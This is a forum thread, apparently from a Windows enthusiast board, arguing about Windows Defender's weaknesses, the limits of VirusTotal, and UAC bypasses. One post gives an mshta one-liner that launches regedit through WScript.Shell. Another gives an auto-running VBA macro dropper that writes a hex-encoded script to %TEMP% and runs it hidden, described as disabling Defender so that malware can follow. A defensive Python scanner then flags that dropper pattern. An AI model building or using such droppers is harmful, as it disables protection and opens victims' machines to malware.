Windows Defender - The worst AV ever?

Discussion in 'Windows 10' started by Windows_Addict, Feb 7, 2020.

  1. chaython

    chaython MDL Novice

    Oct 2, 2011
    4
    1
    0
If VirusTotal doesn't detect the threat, then what can anything do to protect you? If it's already on the system and is executing without detection, it could kill pretty much whatever it wants.
For another AV, the virus could take ownership and force-delete the .sys files for the existing antivirus, making Windows BSOD on reboot.
If it's spyware and you have a firewall, it could still loopback through Firefox...
     
  2. BAU

    BAU MDL Addicted

    Feb 10, 2009
    558
    963
    30
    #102 BAU, Feb 15, 2020
    Last edited: Feb 15, 2020
VirusTotal is a bit deceiving and should never be used as the sole trust factor, as most products featured don't actually trigger their heuristics/HIPS/sandboxing when being batch-run in VMs.
0-days and such require hybrid analysis / sandboxing - there are several choices available online now (each with their pros and cons, RIP Anubis).
    Anyway, that's beside the point.
It's not considered a threat because it is not a threat. You can't expect others to be more Catholic than the Pope.
    "UAC is not a security boundary" -Microsoft
But actually, proper AVs installed on real machines have heuristics engines that, if not blocking, will at least alert you before executing cmd from Notepad, for example.
    And you can't "pull the rug" from other AVs so easily - almost all of them have quite powerful defenses via kernel drivers, and not just one, but multiple redundancies.
    It takes having access to an exploitable signed driver to even begin attacking them.

What's actually hilarious - or very sad - depending on which point you are looking from, is that Defender immediately goes mad when executing stuff like this:
    Code:
    mshta "javascript:window.close(new ActiveXObject('WScript.Shell').Run('regedit.exe -m', 1, 'False'))"
Yet it's completely fine with the stuff we've showcased in this thread.
     
  3. Windows_Addict

    Windows_Addict MDL Senior Member

    Jul 19, 2018
    407
    615
    10
Relying on VirusTotal results is a bad idea: it does not include real-time execution detection or behavioral detection; it only scans a file in the most basic way.
A virus can be encrypted and hidden in a file, and VirusTotal will flag it 100% clean, but antivirus real-time protection will immediately block the threat when the software tries to extract and execute the malicious lines.

For example, today I tested Kaspersky Free against the methods to bypass WD and UAC posted on page 5 of this thread, and it blocked the UAC bypass methods instantly. That doesn't mean it'll surely protect against every UAC bypass, but apparently they have a database for such bypasses and they detect them.

WD should have blocked the UAC bypasses and, for the love of god, at least the .chm help file method, but they don't care; other AVs do, and that's the whole point of this thread.

    edit - just saw that BAU posted above too.
     
  4. BAU

    BAU MDL Addicted

    Feb 10, 2009
    558
    963
    30
More troublesome is that there are dozens of so-called "penetration testing" toolkits available to automate multiple methods until one succeeds - most DLL-injection/MSI/cmstplua/CTF/WNF ones work just fine, and not even Kaspersky will cover all of them... and why should they? Why should a 3rd party fix what Microsoft themselves don't "elevate" (pun intended) as being an issue?
Nobody even bothers reporting UAC bypasses anymore, and stuff only ever gets fixed when tangentially hit by a larger issue.
     
  5. nosirrahx

    nosirrahx MDL Senior Member

    Nov 7, 2017
    371
    190
    10
Not only is this true, but it becomes more true every year. It is impossible to replicate a real bare-metal system and the actual attack vector used at the point of infection for the torrent of samples coming into VT, so the results should be thought of as a piece of the total picture, not a conclusive answer.
     
  6. Krakatoa

    Krakatoa MDL Addicted

    Feb 22, 2011
    500
    740
    30
Example doc macro:
    Code:
    Private Sub Document_Open()
        Dim i As Long
        Dim nFileNum As Integer
        Dim sFilename As String
        Dim strBytes As String
        Dim arrBytes As Variant
        sFilename = Environ("Temp") & "\d.cmd"
        strBytes = "00 00 00 ... 00 00 00"
        strBytes = strBytes & " 00 00 00 ... 00 00 00"
        arrBytes = Split(strBytes)
        nFileNum = FreeFile
        Open sFilename For Binary Lock Read Write As #nFileNum
        For i = LBound(arrBytes) To UBound(arrBytes)
            Put #nFileNum, , CByte("&H" & arrBytes(i))
        Next i
        Close #nFileNum
        Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
    End Sub
In strBytes is d.cmd as hex.
In d.cmd is disable Defender (UAC bypass included).
Undetected.
Functional under an admin account.
The script can continue by installing malware; Defender will already be disabled.
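A defender-side heuristic for the dropper shape in the macro above (auto-run entry point, hex string decoded and written to a file under %TEMP%, then executed via Shell). This is an added example, not the poster's code; the indicator names and the four-indicator threshold are my assumptions, and it is meant for triaging already-extracted macro source (for instance olevba output), not as a replacement for behavioral detection.

```python
import re

# Heuristic indicators for the "hex blob -> file in %TEMP% -> Shell" dropper shape.
# The indicator names and the four-indicator threshold are assumptions for this example.
INDICATORS = {
    "auto_exec": re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b", re.I),
    "temp_path": re.compile(r'Environ\s*\(\s*"(Temp|TMP)"\s*\)|%TE?MP%', re.I),
    "hex_decode": re.compile(r'CByte\s*\(\s*"&H"', re.I),
    "binary_write": re.compile(r"\bOpen\s+.+\s+For\s+Binary\b|\bPut\s+#", re.I),
    "shell_exec": re.compile(r"\bShell\s*\(|WScript\.Shell|cmd\.exe", re.I),
}


def scan_vba(source: str) -> list[str]:
    """Return the indicator names present in a VBA macro source listing."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def is_hex_dropper(source: str) -> bool:
    """True when an auto-run macro decodes hex, writes it to disk and executes it."""
    hits = set(scan_vba(source))
    return {"auto_exec", "hex_decode", "binary_write", "shell_exec"} <= hits


# Constructed sample, shortened from the macro posted above (payload bytes replaced by zeros).
SUSPICIOUS = r'''Private Sub Document_Open()
    Dim arrBytes As Variant
    Dim sFilename As String
    sFilename = Environ("Temp") & "\d.cmd"
    arrBytes = Split("00 00 00")
    Open sFilename For Binary Lock Read Write As #1
    Put #1, , CByte("&H" & arrBytes(0))
    Close #1
    Call Shell("cmd.exe /C ""%TMP%\d.cmd""", vbHide)
End Sub'''

# Constructed benign macro: also runs on open, but only touches document formatting.
BENIGN = '''Private Sub Document_Open()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, scan_vba(src), "dropper" if is_hex_dropper(src) else "clean")
```

String-matching like this is trivially evaded by obfuscation, which is exactly why the thread's point about real-time behavioral detection matters; treat a hit as a reason to sandbox the document, not as a verdict.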
     
  7. BAU

    BAU MDL Addicted

    Feb 10, 2009
    558
    963
    30